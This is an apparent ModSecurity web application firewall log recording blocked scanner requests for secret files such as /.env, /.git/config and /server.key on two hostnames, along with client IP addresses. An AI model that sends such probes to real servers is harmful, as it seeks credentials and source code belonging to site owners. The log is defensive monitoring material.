[Tue Nov 19 02:14:39.032777 2024] [:error] [pid 3411013] [client 213.232.87.228:44819] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/server.key"] [unique_id "Zzvmf2rT1ZS875CeJzeCAAAAAAA"]
[Tue Nov 19 02:59:42.265404 2024] [:error] [pid 3411013] [client 179.43.188.122:45292] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZzvxDmrT1ZS875CeJzeCAgAAAAA"]
[Tue Nov 19 02:59:42.266132 2024] [:error] [pid 3411013] [client 179.43.188.122:45292] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZzvxDmrT1ZS875CeJzeCAgAAAAA"]
[Tue Nov 19 02:59:42.266733 2024] [:error] [pid 3411013] [client 179.43.188.122:45292] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZzvxDmrT1ZS875CeJzeCAgAAAAA"]
[Tue Nov 19 02:59:43.759522 2024] [:error] [pid 3411018] [client 179.43.188.122:34246] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzvxD39RIEz-Md7tNdmrKgAAAAo"]
[Tue Nov 19 02:59:43.759933 2024] [:error] [pid 3411018] [client 179.43.188.122:34246] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzvxD39RIEz-Md7tNdmrKgAAAAo"]
[Tue Nov 19 02:59:43.760152 2024] [:error] [pid 3411018] [client 179.43.188.122:34246] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzvxD39RIEz-Md7tNdmrKgAAAAo"]
[Tue Nov 19 17:12:02.877021 2024] [:error] [pid 3418803] [client 45.148.10.206:34158] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zzy40rHZH7QKzh3BxAhNmgAAAAc"]
[Tue Nov 19 17:12:02.877662 2024] [:error] [pid 3418803] [client 45.148.10.206:34158] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zzy40rHZH7QKzh3BxAhNmgAAAAc"]
[Tue Nov 19 17:12:02.878112 2024] [:error] [pid 3418803] [client 45.148.10.206:34158] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zzy40rHZH7QKzh3BxAhNmgAAAAc"]
[Tue Nov 19 18:18:23.752155 2024] [:error] [pid 3412344] [client 45.148.10.172:54982] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzzIX9PIEV78v7m0l44WDwAAAAI"]
[Tue Nov 19 18:18:23.752778 2024] [:error] [pid 3412344] [client 45.148.10.172:54982] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzzIX9PIEV78v7m0l44WDwAAAAI"]
[Tue Nov 19 18:18:23.753234 2024] [:error] [pid 3412344] [client 45.148.10.172:54982] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzzIX9PIEV78v7m0l44WDwAAAAI"]
[Tue Nov 19 18:43:00.919276 2024] [:error] [pid 3412355] [client 109.205.213.242:54830] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzzOJEMSiTroUUxNNjc6CAAAAAU"]
[Tue Nov 19 18:43:00.919964 2024] [:error] [pid 3412355] [client 109.205.213.242:54830] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzzOJEMSiTroUUxNNjc6CAAAAAU"]
[Tue Nov 19 18:43:00.920466 2024] [:error] [pid 3412355] [client 109.205.213.242:54830] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzzOJEMSiTroUUxNNjc6CAAAAAU"]
[Tue Nov 19 18:43:01.471431 2024] [:error] [pid 3420931] [client 109.205.213.242:54836] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZzzOJUpFn0joz2eVsV4E2gAAAAg"]
[Tue Nov 19 18:43:01.472109 2024] [:error] [pid 3420931] [client 109.205.213.242:54836] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZzzOJUpFn0joz2eVsV4E2gAAAAg"]
[Tue Nov 19 18:43:01.472553 2024] [:error] [pid 3420931] [client 109.205.213.242:54836] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZzzOJUpFn0joz2eVsV4E2gAAAAg"]
[Tue Nov 19 18:43:02.034064 2024] [:error] [pid 3412343] [client 109.205.213.242:54844] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ZzzOJt0YIkxJbgtl7qSj0wAAAAE"]
[Tue Nov 19 18:43:02.034713 2024] [:error] [pid 3412343] [client 109.205.213.242:54844] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ZzzOJt0YIkxJbgtl7qSj0wAAAAE"]
[Tue Nov 19 18:43:02.035194 2024] [:error] [pid 3412343] [client 109.205.213.242:54844] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ZzzOJt0YIkxJbgtl7qSj0wAAAAE"]
[Tue Nov 19 18:43:02.481273 2024] [:error] [pid 3412756] [client 109.205.213.242:54848] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ZzzOJidYloVprdQyTvVphQAAAAY"]
[Tue Nov 19 18:43:02.481848 2024] [:error] [pid 3412756] [client 109.205.213.242:54848] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ZzzOJidYloVprdQyTvVphQAAAAY"]
[Tue Nov 19 18:43:02.482388 2024] [:error] [pid 3412756] [client 109.205.213.242:54848] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ZzzOJidYloVprdQyTvVphQAAAAY"]
[Tue Nov 19 18:43:02.929540 2024] [:error] [pid 3412345] [client 109.205.213.242:54850] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ZzzOJh-0-k__jDvxKhmSRwAAAAM"]
[Tue Nov 19 18:43:02.930134 2024] [:error] [pid 3412345] [client 109.205.213.242:54850] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ZzzOJh-0-k__jDvxKhmSRwAAAAM"]
[Tue Nov 19 18:43:02.930633 2024] [:error] [pid 3412345] [client 109.205.213.242:54850] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ZzzOJh-0-k__jDvxKhmSRwAAAAM"]
[Tue Nov 19 19:49:48.342038 2024] [:error] [pid 3412343] [client 83.192.101.74:58692] [client 83.192.101.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZzzdzN0YIkxJbgtl7qSj1QAAAAE"]
[Tue Nov 19 19:49:48.342801 2024] [:error] [pid 3412343] [client 83.192.101.74:58692] [client 83.192.101.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZzzdzN0YIkxJbgtl7qSj1QAAAAE"]
[Tue Nov 19 19:49:48.343218 2024] [:error] [pid 3412343] [client 83.192.101.74:58692] [client 83.192.101.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZzzdzN0YIkxJbgtl7qSj1QAAAAE"]
[Wed Nov 20 01:22:43.045955 2024] [:error] [pid 3430010] [client 45.148.10.172:53542] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zz0r04SQOjQ7grcxKD67qwAAAAA"]
[Wed Nov 20 01:22:43.046638 2024] [:error] [pid 3430010] [client 45.148.10.172:53542] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zz0r04SQOjQ7grcxKD67qwAAAAA"]
[Wed Nov 20 01:22:43.047022 2024] [:error] [pid 3430010] [client 45.148.10.172:53542] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zz0r04SQOjQ7grcxKD67qwAAAAA"]
[Wed Nov 20 02:58:08.265311 2024] [:error] [pid 3429976] [client 103.102.230.7:56046] [client 103.102.230.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zz1CME-Jc5TVgwK4T5MS_QAAABI"]
[Wed Nov 20 02:58:08.265882 2024] [:error] [pid 3429976] [client 103.102.230.7:56046] [client 103.102.230.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zz1CME-Jc5TVgwK4T5MS_QAAABI"]
[Wed Nov 20 02:58:08.266152 2024] [:error] [pid 3429976] [client 103.102.230.7:56046] [client 103.102.230.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zz1CME-Jc5TVgwK4T5MS_QAAABI"]
[Wed Nov 20 03:37:47.975846 2024] [:error] [pid 3432836] [client 103.102.230.7:59958] [client 103.102.230.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zz1LexXCl2FtfQrz1hPkYwAAAAY"]
[Wed Nov 20 03:37:47.976218 2024] [:error] [pid 3432836] [client 103.102.230.7:59958] [client 103.102.230.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zz1LexXCl2FtfQrz1hPkYwAAAAY"]
[Wed Nov 20 03:37:47.976452 2024] [:error] [pid 3432836] [client 103.102.230.7:59958] [client 103.102.230.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zz1LexXCl2FtfQrz1hPkYwAAAAY"]
